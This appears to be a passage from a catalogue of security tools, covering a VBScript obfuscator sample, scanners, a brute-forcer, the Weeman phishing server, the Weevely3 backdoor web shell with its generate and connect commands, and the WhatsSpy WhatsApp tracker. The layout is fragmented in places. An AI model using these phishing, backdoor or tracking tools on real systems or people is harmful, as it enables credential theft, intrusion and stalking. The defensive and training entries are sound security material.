kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
next
execute(kLTOaGJfsmSG)
Second output
Dim wEQHvB, vsSBaV, pwgtko
wEQHvB =
"-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+50
58*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/
3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9
482*347644/7901*181536/5673*198712/1684*615734/6283*779-7
00*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632
*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5
259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640
-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204
*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*12761171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5
680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263
*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-7
73+884*546720/4556*5235-5201"
vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
for each KxRKRt in vsSBaV
pwgtko = pwgtko & chr(eval(KxRKRt))
next
execute(pwgtko)
Download VBS-Obfuscator
VBSCAN - AN BLACK BOX VBULLETIN VULNERABILITY
SCANNER
VBScan is a Black Box vBulletin vulnerability scanner. Written

in Perl
Demo on youtube:
An error occurred.
Security Bug Found by VBScan in Ubuntu / Fedora/ python forums

by VBScan Vulnerability Scanner
An error occurred.
Report any bug to : me@reza.es
DownloadVBScan
WAIDPS - WIRELESS AUDITING, INTRUSION DETECTION
& PREVENTION SYSTEM
WAIDPS is an open source wireless swissknife written in

Python and work on Linux environment. This is a multipurpose
tools designed for audit (penetration testing) networks, detect
wireless intrusion (WEP/WPA/WPS attacks) and also intrusion
prevention (stopping station from associating to access point).

Apart from these, it will harvest all WiFi information in the
surrounding and store in databases. This will be useful when it
comes to auditing a network if the access point is MAC filtered
or hidden SSID and there isnt any existing client at that
moment.
WAIDS may be useful to penetration testers, wireless trainers,
law enforcement agencies and those who is interested to know
more about wireless auditing and protection. The primarily
purpose for this script is to detect intrusion. Once wireless
detect is found, it display on screen and also log to file on the
attack. Additional features are added to current script where
previous WIDS does not have are :
automatically save the attack packets into a file
interactive mode where users are allow to perform many
functions
allow user to analyse captured packets
load previously saved pcap file or any other pcap file to be
examine
customizing filters
customize detection threshold (sensitivity of IDS in
detection)
At present, WAIDS is able to detect the following wireless
attacks and will subsequently add other detection found in the
previous WIDS.
Association / Authentication flooding
Detect mass deauthentication which may indicate a
possible WPA attack for handshake
Detect possible WEP attack using the ARP request replay
method
Detect possible WEP attack using chopchop method
Detect possible WPS pin bruteforce attack by Reaver,
Bully, etc.
Detection of Evil-Twin
Detection of Rogue Access Point
The whole structure of the Wireless Auditing, Intrusion

Detection & Prevention System will comprise of
Harvesting WiFi Information [Done]
Intrusion Detection [Partially Done]
Intrusion Prevention [Partially Done]
Auditing (Testing network) [Coming Soon]
Other additional item include analyzing of packets, display of
captured dump, display network barchart and much more.
Requirements
No special equipment is required to use this script as long as

you have the following :
1. Root access (admin)
2. Wireless interface which is capable of monitoring and
injection
3. Python 2.7 installed
4. Aircrack-NG suite installed
5. TShark installed
6. TCPDump installed
7. Mergecap installed (for joining pcap files)
8. xterm installed
Read more here.
DownloadWAIDPS
WAKEMEONLAN V1.71 - TURN ON COMPUTERS ON YOUR
NETWORK WITH WAKE-ON-LAN PACKET
This utility allows you to easily turn on one or more computers

remotely by sending Wake-on-LAN (WOL) packet to the remote
computers.
When your computers are turned on, WakeMeOnLan allows
you to scan your network, and collect the MAC addresses of all
your computers, and save the computers list into a file. Later,
when your computers are turned off or in standby mode, you
can use the stored computers list to easily choose the
computer you want to turn on, and then turn on all these
computers with a single click.
WakeMeOnLan also allows you to turn on a computer from
command-line, by specifying the computer name, IP address,
or the MAC address of the remote network card.
System Requirements And Limitations
On the computer that you run WakeMeOnLan:

WakeMeOnLan works on any version of Windows, starting
from Windows 2000 and up to Windows 8, including x64
versions of Windows.
On the remote computer: WakeMeOnLan can turn on the
remote computer only if this feature is supported and
enabled on the remote computer. Be aware that Wake-onLAN feature only works on wired network. Wireless
networks are not supported.
In order to enable the Wake-on-LAN feature on the remote
computer:
On some computers, you may need to enable this
feature on the BIOS setup.
In the network card properties, you should go to the
'Power Management' and/or 'Advanced' tabs of the
network adapter, and turn on the Wake-on-LAN
feature.
Start Using WakeMeOnLan
WakeMeOnLan doesn't require any installation process or

additional dll files. In order to start using it, simple run the
executable file - WakeMeOnLan.exe
After running WakeMeOnLan, the first thing to do is to scan
your network and collect the MAC addresses/computer names/
IP addresses on your network. In order to start the network
scan, simply press F5. If WakeMeOnLan scans the wrong IP
addresses range, you can stop the scan process by pressing
F6, and then go to the 'Advanced Options' window (F9), and
choose the correct IP addresses range to scan.
All the computers information collected by WakeMeOnLan is
saved into the configuration file (WakeMeOnLan.cfg) for
loading it on the next time that you use WakeMeOnLan. You
can also scan your network multiple times, and if there is a new
computers on your network, it'll be added to the list. Scanning
your network also updates the current status of every computer
- 'on' (green icon) or 'off' (red icon). If there are obsolete
computers on the list, you can remove them by using the
'Delete Selected Items' option.
Turn On Remote Computers On Your Network
After scanning your network in the first time, it's very easily to
turn on the computers you need. Simply run WakeMeOnLan,
select the desired computers, and then choose the 'Wake Up
Selected Computer' option (F8).
After using the 'Wake Up Selected Computer' option, you can
run another network scan, to verify that the computers are
really turned on. Turned on computers are displayed with green

icon.
External MAC Addresses File
WakeMeOnLan uses an internal MAC Addresses database in

order to display the company name of every network adapter.
However, the internal database is not always updated with the
latest MAC address assignments.
You can manually download the latest MAC addresses file from
http://standards-oui.ieee.org/oui.txt and then put oui.txt in the
same folder where WakeMeOnLan.exe is located. When you
run WakeMeOnLan.exe, it'll automatically load and use the
external oui.txt instead of the internal MAC addresses
database.
Turn On a Computer From Command-Line
WakeMeOnLan allows you to wake up a computer on your

network without displaying any user interface, by using the /
wakeup command-line option. You can specify the computer
name, IP address, or the free user text that you typed in the
properties window, as long as the computer information is
stored inside the .cfg file. You can also specify the MAC
address of the remote network card, even if the computer is not
stored in the .cfg file.
Optionally, you can specify the port number in the second
parameter, and broadcast address in the third parameter.
Examples:
WakeMeOnLan.exe /wakeup 192.168.1.25
WakeMeOnLan.exe /wakeup Comp01
WakeMeOnLan.exe /wakeup Comp02
WakeMeOnLan.exe /wakeup 40-65-81-A7-16-23
WakeMeOnLan.exe /wakeup 406581A71623
WakeMeOnLan.exe /wakeup Comp02 30000 192.168.0.255
WakeMeOnLan.exe /wakeup 192.168.1.25 20000
192.168.1.255
You can also wake up all computers in the list by using /
wakeupall command-line option. Like in the /wakeup commandline option, you can optionally specify broadcast address and
port number.
Examples:
WakeMeOnLan.exe /wakeupall
WakeMeOnLan.exe /wakeupall 20000 192.168.2.255 If you
want to wake up all computers in specific IP addresses range,
you can use /wakeupiprange command-line option
Examples:
WakeMeOnLan.exe /wakeupiprange 192.168.0.25
192.168.0.100
WakeMeOnLan.exe /wakeupiprange 192.168.0.11
192.168.0.20 20000 192.168.0.255
Scan Your Network From Command-Line
WakeMeOnLan allows you to scan your network and update

the computers list on the .cfg file without displaying any user
interface, by using the /scan command-line option:
WakeMeOnLan.exe /scan
You can also specify specific IP addresses range to scan, for
example:
WakeMeOnLan.exe /scan /UseIPAddressesRange 1 /
IPAddressFrom 192.168.1.1 /IPAddressTo 192.168.1.254 /
UseNetworkAdapter 0
More Command-Line Options
/
IPAddressF
rom <IP
Address>
/
IPAddressT
o <IP
Address>
Specifies the IP adderess range to scan.
/
UseIPAddr
essesRang
e <0 | 1>
Specifies whether to scan with specific IP

addresses range (Specified in /
IPAddressFrom and /IPAddressTo
command-line options)
0 = No, 1 = Yes
/
UseNetwor
kAdapter
<0 | 1>
Specifies whether to scan the IP addresses

range of the specified adapter (/
NetworkAdapter)
0 = No, 1 = Yes
/
UseNetwor
kAdapter
<Name>
Specifies the network adapter name when /

UseNetworkAdapter is 1
/
MacAddres
sFormat <1
| 2 | 3>
Specifies the MAC address format to

display:
1 = XX-XX-XX-XX-XX-XX
2 = XX:XX:XX:XX:XX:XX
3 = XXXXXXXXXXXX
/
UseNetBio
s <0 | 1>
Specifies whether to use NetBIOS scan.

0 = No, 1 = Yes
/cfg
<Filename
>
Start WakeMeOnLan with the specified

configuration file. For example:
WakeMeOnLan.exe /cfg "c:\config\won.cfg"
WakeMeOnLan.exe /cfg "%AppData%
\WakeMeOnLan.cfg"
/stext
<Filename
>
Save the list of computers that you

previously scanned into a simple text file.
/stab
<Filename
>

previously scanned into a tab-delimited text
file.
/scomma
<Filename
>

previously scanned into a comma-delimited
text file (csv).
/stabular
<Filename
>

previously scanned into a tabular text file.
/shtml
<Filename
>

previously scanned into HTML file
(Horizontal).
/sverhtml
<Filename
>

previously scanned into HTML file (Vertical).
/sxml
<Filename
>

previously scanned into XML file.
/sort
<column>

column. If you don't specify this option, the
list is sorted according to the last sort that
you made from the user interface. The
<column> parameter can specify the column
index (0 for the first column, 1 for the second
column, and so on) or the name of the
column, like "Computer Name" and
"Workgroup". You can specify the '~' prefix
character (e.g: "~MAC Address") if you want
to sort in descending order. You can put
multiple /sort in the command-line if you
want to sort by multiple columns. Examples:
WakeMeOnLan.exe /shtml "c:\temp
\WakeMeOnLan.html" /sort 2 /sort ~1
WakeMeOnLan.exe /shtml "c:\temp
\WakeMeOnLan.html" /sort "Workgroup" /
sort "Computer Name"
/nosort

DownloadWakeMeOnLan v1.71
WALDO - MULTITHREADED DIRECTORY AND
SUBDOMAIN BRUTEFORCER
Waldo is a lightweight and multithreaded directory and

subdomain bruteforcer implemented in Python. It can be used
to locate hidden web resources and undiscovered subdomains
of the specified target.
Key Features
Quickly and easily generate a list of all subdomains of

target domain
Discover hidden web resources that can be potentially
leveraged as part of an attack
Written in Python and very portable
Fast, multithreaded design
Setup
Dependencies can be installed by running:

$ pip install -r pip.req
To run the waldo:

$ python waldo.py
Usage To enumerate subdomains at some-fake-site.example,

execute the following:
$ python waldo.py -m s -d some-fake-site.example
To enumerate directories at some-fake-site.example, execute

the following:
$ python waldo.py -m d -d some-fake-site.example
By default, output will be logged to waldo-output.txt. To specify

a custom output file, use the -l flag:
$ python waldo.py -m s -l my-log-file.txt -d some-fakesite.example
Waldo uses 4 threads by default. To specify a custom

threadpool size, use the -t flag:
$ python waldo.py -m s -d some-fake-site.example -t 15
DownloadWaldo
WAP - WEB APPLICATION PROTECTION
WAP is a source code static analysis and data mining tool to

detect and correct input validation vulnerabilities in web
applications written in PHP (version 4.0 or higher) with a low
rate of false positives.
WAP detects and corrects the following vulnerabilities:
SQL Injection (SQLI)
Cross-site scripting (XSS)
Remote File Inclusion (RFI)
Local File Inclusion (LFI)
Directory Traversal or Path Traversal (DT/PT)
Source Code Disclosure (SCD)

OS Command Injection (OSCI)
PHP Code Injection
This tool semantically analyses the source code. More

precisely, it does taint analysis (data-flow analysis) to detect the
input validation vulnerabilities. The aim of the taint analysis is to
track malicious inputs inserted by entry points ($_GET,
$_POST arrays) and to verify if they reach some sensitive sink
(PHP functions that can be exploited by malicious input). After
the detection, the tool uses data mining to confirm if the
vulnerabilities are real or false positives. At the end, the real
vulnerabilities are corrected with the insertion of the fixes (small
pieces of code) in the source code.
WAP is written in Java language and is constituted by three
modules:
Code Analyzer: composed by the tree generator and taint

analyzer. The tool has integrated a lexer and a parser
generated by ANTLR, and based in a grammarand a tree
grammar written to PHP language. The tree generator
uses the lexer and the parser to build the AST (Abstract
Sintatic Tree) to each PHP file. The taint analyzer
performs the taint analysis navigating through the AST to
detect potentials vulnerabilities.
False Positives Predictor: composed by a supervised

trained data set with instances classified as being
vulnerabilities and false positives and by the Logistic
Regression machine learning algorithm. For each potential
vulnerability detected by code analyzer, this module
collects the presence of the attributes that define a false
positive. Then, the Logistic Regression algorithm receives
them and classifies the instance as being a false positive
or not (real vulnerability).
Code Corrector: Each real vulnerability is removed by

correction of its source code. This module for the type of
vulnerability selects the fix that removes the vulnerability
and signalizes the places in the source code where the fix
will be inserted. Then, the code is corrected with the
insertion of the fixes and new files are created.
DownloadWAP
WATCHER V1.5.8 - WEB SECURITY TESTING TOOL AND
PASSIVE VULNERABILITY SCANNER
Watcher is a runtime passive-analysis tool for HTTP-based

Web applications. Being passive means it won't damage
production systems, it's completely safe to use in Cloud

computing, shared hosting, and dedicated hosting
environments. Watcher detects Web-application security issues
as well as operational configuration issues. Watcher provides
pen-testers hot-spot detection for vulnerabilities, developers
quick sanity checks, and auditors PCI compliance auditing. It
looks for issues related to mashups, user-controlled payloads
(potential XSS), cookies, comments, HTTP headers, SSL,
Flash, Silverlight, referrer leaks, information disclosure,
Unicode, and more.
Major Features:
1. Passive detection of security, privacy, and PCI

compliance issues in HTTP, HTML, Javascript, CSS, and
development frameworks (e.g. ASP.NET, JavaServer)
2. Works seamlessly with complex Web 2.0 applications
while you drive the Web browser
3. Non-intrusive, will not raise alarms or damage production
sites
4. Real-time analysis and reporting - findings are reported
as theyre found, exportable to XML, HTML, and Team
Foundation Server (TFS)
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks
Watcher is built as a plugin for the Fiddler HTTP debugging
proxy available at www.fiddlertool.com. Fiddler provides all of
the rich functionality of a good Web/HTTP proxy. With Fiddler
you can capture all HTTP traffic, intercept and modify, replay
requests, and much much more. Fiddler provides the HTTP
proxy framework for Watcher to work in, allowing for seamless
integration with todays complex Web 2.0 or Rich Internet
Applications. Watcher runs silently in the background while you
drive your browser and interact with the Web-application.
Watcher is built in C# as a small framework with 30+ checks
already included. It's built so that new checks can be easily

created to perform custom audits specific to your organizational
policies, or to perform more general-purpose security
assessments. Examples of the types of issues Watcher will
currently identify:
ASP.NET VIEWSTATE insecure configurations
JavaServer MyFaces ViewState without cryptographic
protections
Cross-domain stylesheet and javascript references
User-controllable cross-domain references
User-controllable attribute values such as href, form
action, etc.
User-controllable javascript events (e.g. onclick)
Cross-domain form POSTs
Insecure cookies which don't set the HTTPOnly or secure
flags
Open redirects which can be abused by spammers and
phishers
Insecure Flash object parameters useful for cross-site
scripting
Insecure Flash crossdomain.xml
Insecure Silverlight clientaccesspolicy.xml
Charset declarations which could introduce vulnerability
(non-UTF-8)
User-controllable charset declarations
Dangerous context-switching between HTTP and HTTPS
Insufficient use of cache-control headers when private
data is concerned (e.g. no-store)
Potential HTTP referer leaks of sensitive user-information
Potential information leaks in URL parameters
Source code comments worth a closer look
Insecure authentication protocols like Digest and Basic
SSL certificate validation errors
SSL insecure protocol issues (allowing SSL v2)
Unicode issues with invalid byte streams
Sharepoint insecurity checks
more.
Reducing false positives is a high priority, suggestions are

welcome. Right now each check takes steps to reduce false
positives, some better than others, and checks can be
individually disabled if theyre generating too much noise.
RELEASE NOTES
Watcher.zip contains the two DLL's for manual installation of

the plugin - drop them in your Fiddler2\Scripts user or program
files folder.
WatcherSetup.exe is an installer built with NSIS that will copy
the two DLL's into either your Fiddler2\Scripts user or program
files folder.
WatcherTFS.zip contains the Team Foundation Server (TFS)
component which Watcher uses to export results to TFS.
Installation and further instructions are included in the ZIP file.
CHANGELOG
Program Watcher Passive Web Security Tool for Fiddler
Version 1.5.8
Release 25-June-2013
License Custom Open Source
Authors Chris Weber
Testers Chris Weber
Contact chris@casaba.com
Website http://websecuritytool.codeplex.com/
Company http://www.casaba.com/
Copyright (c) 2010 - 2013 Casaba Security, LLC. All Rights
Reserved.
{"
+++ major new feature
+ minor new feature
* changed feature
% improved performance or quality

! fixed minor bug
!!! fixed major bug
v1.5.8 2013-06-25
! Fixed bug in SSL certificate validation
DownloadWatcher v1.5.8
WEB SECURITY DOJO - TRAINING ENVIRONMENT FOR
WEB APPLICATION SECURITY PENETRATION TESTING
A free open-source self-contained training environment for Web

Application Security penetration testing. Tools + Targets = Dojo
What?
Various web application security testing tools and vulnerable

web applications were added to a clean install of Ubuntu
v10.04.2, which is patched with the appropriate updates and
VM additions for easy use.
Why?
The Web Security Dojo is for learning and practicing web app
security testing techniques. It is ideal for self-teaching and skill
assessment, as well as training classes and conferences since
it does not need a network connection. The Dojo contains
everything needed to get started tools, targets, and
documentation.
Feature Overview
Targets include:
OWASPs WebGoat
Googles Gruyere
Damn Vulnerable Web App
Hacme Casino
OWASP InsecureWebApp
w3afs test website
simple training targets by Maven Security (including REST
and JSON)
Tools: (starred = new this version)
Burp Suite (free version)
w3af
sqlmap
arachni *
metasploit
Zed Attack Proxy *
OWASP Skavenger
OWASP Dirbuster
Paros
Webscarab
Ratproxy
skipfish
websecurify
davtest
J-Baah
JBroFuzz
Watobo *
RATS
helpful Firefox add-ons
DownloadWeb Security Dojo

WEEMAN - HTTP SERVER FOR PHISHING
HTTP server for phishing in python. Weeman has support for

most of the (bigest) websites.
Usually you will want run Weeman with DNS spoof attack. (see
dsniff, ettercap).
Weeman will do the following steps:
1.
2.
3.
4.
Create fake html page.

Wait for clients
Grab the data (POST).
Try to login the client to the original page
Requirements
Python <= 2.7.

Python BeautifulSoup 4
Install BeautifulSoup
Archlinux - sudo pacman -S python2-beautifulsoup4

Ubuntu/Linuxmint - sudo apt-get install python-bs4
For another OS: - sudo pip install beautifulsoup4
Platforms
Linux (any)
Mac (Not tested)
Windows (Not tested)
[!] If weeman runs on your platform (Mac/Windows), please let
me know.
Usage
Just type help
Run server:
For port 80 you need to run Weeman as root!

Host to clone (Ex: www.social-networks.local)
set url http://localhost
"<"form action = "TAKE THIS URL">"(View the site

source and take the URL)
set action_url http://localhost/sendlogin
The port Weeman server will listen

set port 2020
Start the server

run
The settings will be saved for the next time you run weeman.py.
DownloadWeeman
WEEVELY3 - WEAPONIZED WEB SHELL
Weevely is a command line web shell dynamically extended

over the network at runtime designed for remote administration
and pen testing. It provides a weaponized telnet-like console
through a PHP script running on the target, even in restricted

environments.
The low footprint agent and over 30 modules shape an
extensible framework to administrate, conduct a pen-test, postexploit, and audit remote web accesses in order to escalate
privileges and pivot deeper in the internal networks.
Feature:
Shell/PHP telnet-like network terminal

Common server misconfigurations auditing
SQL console pivoting on target
HTTP traffic proxying through target
Mount target file system to local mount point
Conduct network scans pivoting on target
File upload and download
Spawn reverse and direct TCP shells
Bruteforce services accounts
Compress and decompress zip, gzip, bzip2 and tar
archives
The backdoor agent
The remote agent is a very low footprint php script that receives
dynamically injected code from the client, extending the client
functionalities over the network at run-time. The agent code is
polymorphic and hardly detectable by AV and HIDS. The
communication is covered and obfuscated within the HTTP
protocol using steganographic techniques.
Modules development
Weevely also provides python API which can be used to

develop your own module to implement internal audit, account
enumerator, sensitive data scraper, network scanner, make the
modules work as a HTTP or SQL client and do a whole lot of
other cool stuff.
Installation
Linux
The following example runs on a Debian/Ubuntu derived Linux
environments with Python version 2.7.
# Make sure that the python package manager and yaml
libraries are installed
$ sudo apt-get install g++ python-pip libyaml-dev pythondev
# Install requirements
$ sudo pip install prettytable Mako PyYAML pythondateutil PySocks --upgrade
OS X
The following example runs on OS X with the Macports
packaging system.
$ sudo port install python27 py27-pip
$ sudo port select --set pip pip27
$ sudo port select --set python python27
# Ideally, at this point you should install editline
library (http://thrysoee.dk/editline/)
# to have a working line completion in terminal. See
issue #7 for more info.
$ sudo pip install prettytable Mako PyYAML pythondateutil readline PySocks --upgrade
Windows
The following example runs on Microsoft Windows 7 with
Python version 2.7, and likely on other Windows version. First
of all, install Python 2.7 and pip package manager using
ez_setup.py as explained in this guide.
# Enter in a folder which allows to call pip.exe usually
C:\Python27\Scripts\ with no %PATH% set and
# install the following requirements
> pip install prettytable Mako PyYAML python-dateutil

pyreadline PySocks --upgrade
Generate the backdoor agent
Weevely client communicates to the PHP agent installed into

the target. Run ./weevely.py to print help.
$ ./weevely.py
[+] weevely 3.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password>
[+] Load session file
weevely session <path>
[+] Generate backdoor agent
weevely generate <password> <path>
To generate a new agent, just use the generate option passing

the password and path arguments.
$ ./weevely.py generate mypassword agent.php
Generated backdoor with password 'mypassword' in
'agent.php' of 1469 byte size.
Then, upload the generated agent under the target web folder.
Make sure that the agent PHP script is properly exposed and
executable through the web server.
Connect to the agent
Launch weevely script to connect to the remote agent.

$ ./weevely.py http://target/agent.php mypassword
weevely>
The first prompt weevely> is still not connected to allow users

to set any useful pre-connection option e.g. set proxies to be
used. Running a real command starts automatically the session
on the remote target.
weevely> ls
agent.php
index.html
joomla-3.2.1
www-data@target:/var/www $ cd ..
www-data@target:/var/ $ whoami
www-data
www-data@target:/var/ $ uname -a
Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4
21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
www-data@target:/var/ $
Download Weevely3
WFUZZ - THE WEB APPLICATION BRUTEFORCER
Wfuzz is a tool designed for bruteforcing Web Applications, it
can be used for finding resources not linked (directories,

servlets, scripts, etc), bruteforce GET and POST parameters
for checking different kind of injections (SQL, XSS, LDAP,etc),
bruteforce Forms parameters (User/Password), Fuzzing,etc.
Some features
Multiple Injection points capability with multiple

dictionaries
Recursion (When doing directory bruteforce)
Post, headers and authentication data brute forcing
Output to HTML
Colored output
Hide results by return code, word numbers, line numbers,
regex.
Cookies fuzzing
Multi threading
Proxy support
SOCK support
Time delays between requests
Authentication support (NTLM, Basic)
All parameters bruteforcing (POST and GET)
Multiple encoders per payload
Payload combinations with iterators
Baseline request (to filter results against)
Brute force HTTP methods
Multiple proxy support (each request through a different
proxy)
HEAD scan (faster for resource discovery)
Dictionaries tailored for known applications (Weblogic,
Iplanet, Tomcat, Domino, Oracle 9i, Vignette, Coldfusion
and many more.i (Many dictionaries are from Darkraver's
Dirb, www.open-labs.org)
Payloads
File
List
hexrand
range
names
hexrange
Encodings
random_uppercase
urlencode
binary_ascii
base64
double_nibble_hex
uri_hex
sha1
md5
double_urlencode
utf8
utf8_binary
html
html decimal
custom
many more...
Iterators
Product
Zip
Chain
Download Wfuzz
WHATSSPY - TRACE THE MOVES OF A WHATSAPP USER
WhatsSpy Public is an web-oriented application that tracks

every move of whoever you like to follow. This application is
setup as an Proof of Concept that Whatsapp is broken in terms
of privacy. Once you've setup this application you can track
users that you want to follow on Whatsapp. Once it's running it
keeps track of the following activities:
Online/Offline status (even with privacy options set to
"nobody")
Profile pictures
Privacy settings
Status messages
I made this project for you to realise how broken the privacy
options actually are. It just started out as experimenting with
Whatsapp to build an Bot, but I was stunned when I realised
someone could abuse this "online" feauture of Whatsapp to
track anyone. I could just say this in like a blog article (like I
tried but got marked as spam) that the privacy options are
broken, but you wouldnt realise the impact it actually has.
Requirements
Shortlist requirements:
Secondary Whatsapp account (phonenumber that doesn't
use Whatsapp)
Rooted Android phone OR Jailbroken iPhone OR PHP
knowledge
Server/RPi that runs 24/7
Nginx or Apache with PHP with PDO (php5-pgsql
installed) (you can't host on simple webhoster, you need
bash)
Postgresql
Notice
WhatsSpy Public requires an secondary Whatsapp account.
Once the tracker is started, you will not be able to recieve any
messages over Whatsapp for this phonenumber. You can
either try to register an non-Whatsapp used phonenumber with
for example this script or just buy an 5 euro SIM Card and use
this phonenumber for the tracker.
For the tracker to work you need an secret which is retrieved
from either your Phone or the register script mentioned above.
In case of phone registration you need an jailbroken iPhone or
rooted Android device in order to retrieve the secret.
Jailbroken iPhone users: You can retrieve using this
script.
Rooted Android phones can use the following APK to
retrieve the secret.
In order to retrieve the scecret you need to follow these steps:
Insert your (new) secondary SIM card in your phone and
boot it up.
Re-install Whatsapp on your phone and activate it using
the new phonenumber.
Use either the APK (Android) or the script (iPhone) to
retrieve the WhatsApp secret. Write this secret down,
which is required later.
Insert your normal SIM card and re-install WhatsApp for
normal use.
DownloadWhatsSpy
WHONIX V11 - ANONYMOUS OPERATING SYSTEM
Whonix is an operating system focused on anonymity, privacy

and security. Its based on the Tor anonymity network, Debian
GNU/Linux and security by isolation. DNS leaks are impossible,
and not even malware with root privileges can find out the
users real IP.
Whonix consists of two parts: One solely runs Tor and acts as a
gateway, which we call Whonix-Gateway. The other, which we
call Whonix-Workstation, is on a completely isolated network.
Only connections through Tor are possible.
Whonix for Qubes

https://www.whonix.org/wiki/Qubes
Whonix for KVM
https://www.whonix.org/wiki/KVM
Whonix for VirtualBox
https://www.whonix.org/wiki/VirtualBox
If you want to upgrade existing Whonix version using
Whonixs APT repository
Special instructions required:
h t t p s : / / w w w . w h o n i x . o r g / w i k i /
Upgrading_Whonix_10_to_Whonix_11
Changelog between Whonix10.0.0.5.5 and Whonix
11.0.0.2.3:
fixed custom workstation build
build script: refactoring, use errtrace rather than many traps
https://phabricator.whonix.org/T48
build script: refactoring, use exit trap to reduce code
duplication https://phabricator.whonix.org/T269
whonixcheck: warn if whonix-gateway / whonix-workstation
package is not installed https://phabricator.whonix.org/T264
whonixcheck: warn if there is low entropy https://
phabricator.whonix.org/T202
build, anon-apt-sources-list, anon-shared-build-apt-sourcestpo, whonix-repository: changed release codename from
wheezy to jessie https://phabricator.whonix.org/T270
grub-enable-apparmor: Refactoring. Simplified for Debian
jessie. Thanks to the new `/etc/default/grub.d` configuration
folder, the `grub-enable-apparmor` has been greatly simplified.
No longer need to config-package-dev divert `/etc/default/grub`.
genmkfile: if debuild not available, recommend installation of
the devscripts package
build
script:
added
fakeroot
to
whonix_build_script_build_dependency (required for verifiable
builds)
genmkfile: if debuild not available, recommend installation of
the devscripts package
g e n m k fi l e : fi x , d o n o t s e t a u t o m a t i c a l l y
make_use_gain_root_command to true if fakeroot is not
installed
genmkfile: run dpkg-checkbuilddeps before lintian to show
better hint if build dependencies are missing
build script: build-steps.d/1200_create-debian-packages:
commented out get_extra_packages, no longer need to
download packages from testing
build script: refactoring, created separate help step, helpsteps/git_sanity_test
whonixcheck:
verbose
output
for
check_tor_socks_port_reachability
all packages: packaging, bumped Standards-Version from
3.9.4 to 3.9.6 for jessie support
lintian warning copyright fix
tb-updater: show highest version number is not necessarily
the best one message also on first run if no Tor Browser is
installed yet https://phabricator.whonix.org/T283
build script: No longer install acpi-support-base by default on
jessie, because systemd now implements that functionality.
whonixcheck: added link to Whonix Build Version
documentation https://www.whonix.org/wiki/
Whonixcheck#Whonix_Build_Version https://
build
script:
Fix
commit
287bdcf6ddee007ba579e3ee9a1997edc8188581 makefile:
added pedantic to default DEBUILD_LINTIAN_OPTS because
we are going to fix the last remaining missing upstream
changelog warning added pedantic help-steps/variables.
all packages: added debian/source/lintian-overrides with

debian-watch-may-check-gpg-signature to fix lintian warning
whonix-setup-wizard, anon-gw-anonyminizer-config,
whonixcheck, whonix-ws-start-menu-additions, whonix-hostfirewall: added Keywords= to .desktop files to fix lintian
warning desktop-entry-lacks-keywords-entry https://
anon-shared-helper scripts: replaced dependency pythonsupport (>= 0.90) with dh-python to fix lintian warning
control-port-filter-python: packaging, use debhelper with
python2 to fix lintian warning
modify apt-get parameters during build to prevent need to
remove apt-listchanges https://phabricator.whonix.org/T282
build-script: refactoring, moved variables
DEBIAN_FRONTEND DEBIAN_PRIORITY
D E B C O N F _ N O W A R N I N G S
APT_LISTCHANGES_FRONTEND from help-steps/variables
to buildconfig.d/30_apt_opts
genmkfile: hint Is the build dependency genmkfile installed?
if genmkfile is not installed
genmkfile: hint dpkg-parsechangelog not found. Do you have
the build-essential package installed? if dpkg-parsechangelog
is not available
sdwdate: removed dependency on ruby1.9.1-dev to fix lintian
warning E: sdwdate: depends-on-obsolete-package depends:
ruby1.9.1-dev
whonixcheck: show diagnostic message on whonixcheck
Whonix News gpg verification failure by default
build script: Fix building Whonix on Whonix, fix if `lsb_release
short i` returns Whonix. Temp hack export
whonix_build_on_operating_system=debian no longer
required. Thanks to @nrgaway for the bug report and the
analysis. https://phabricator.whonix.org/T278
tb-updater: tbbversion_installed parser fix
anon-meta-packages: removed dependency on libupower-
glib1 which is no longer available in Debian jessie (which has

been replaced by upower, that already gets installed)
anon-base-files, whonix-developer-meta-files: implemented
WHONIX_BUILD_QUBES=true environment variable support
anon-meta-packages: whonix-gateway and whonixworkstation package no longer depend on anon-shared-buildfix-grub because it has been made a weak dependency for
better physical isolation and Qubes support
code simplification, removed support for environment variable
ANON_BUILD_INSTALL_TO_ROOT=true because anonshared-build-fix-grub now gets only installed on required
platforms
implemented build parameter unsafe-io true, that speeds
up builds, that uses -o Dpkg::Options::=force-unsafe-io,
eatmydata and ignores sync. Thanks to @nrgaway for the
suggestion! https://phabricator.whonix.org/T295
implemented $apt_misc_opts https://
whonixcheck: new verbose debug feature, showing output of
systemd-detect-virt
vbox-disable-timesync: more robust implementation that is
compatible with systemd https://phabricator.whonix.org/T106
timesync: compatibility with systemd https://
whonixcheck, msgdispatcher: ported to systemd https://
qubes-whonix: skip rads on Qubes https://
systemd unit files: workaround/fix, removed spaces from
WantedBy = , likely bug in deb-systemd-helper that prevents
enabling the service by default https://phabricator.whonix.org/
T316
created a hellodaemon package, useful for Debian systemd
packaging debugging not part of Whonix https://github.com/
adrelanos/hellodaemon
whonixcheck: debian/control: fix, added to Build-Depends:

ruby-ronn (>= 0.7.3)
disable torsocks warning spam https://
whonix-libvirt: fixed CI builds
whonix-libvirt: added driver name=qemu Thanks to
HulaHoop! https://github.com/Whonix/whonix-libvirt/pull/20
https://github.com/Whonix/whonix-libvirt/pull/19 https://
github.com/Whonix/whonix-libvirt/pull/18
anon-meta-packages: added obfs4proxy to anon-gatewaypackages-recommended https://phabricator.whonix.org/T323
anon-meta-packages: added apt-transport-tor to anonshared-packages-recommended https://
whonix-gw-network-conf, whonix-ws-network-conf: Removed
pre-up /usr/bin/whonix_firewall, because /etc/network/if-preup.d to load the firewall, because of a Debian upstream bug
interface comes up even if a script in /etc/network/if-pre-up.d/
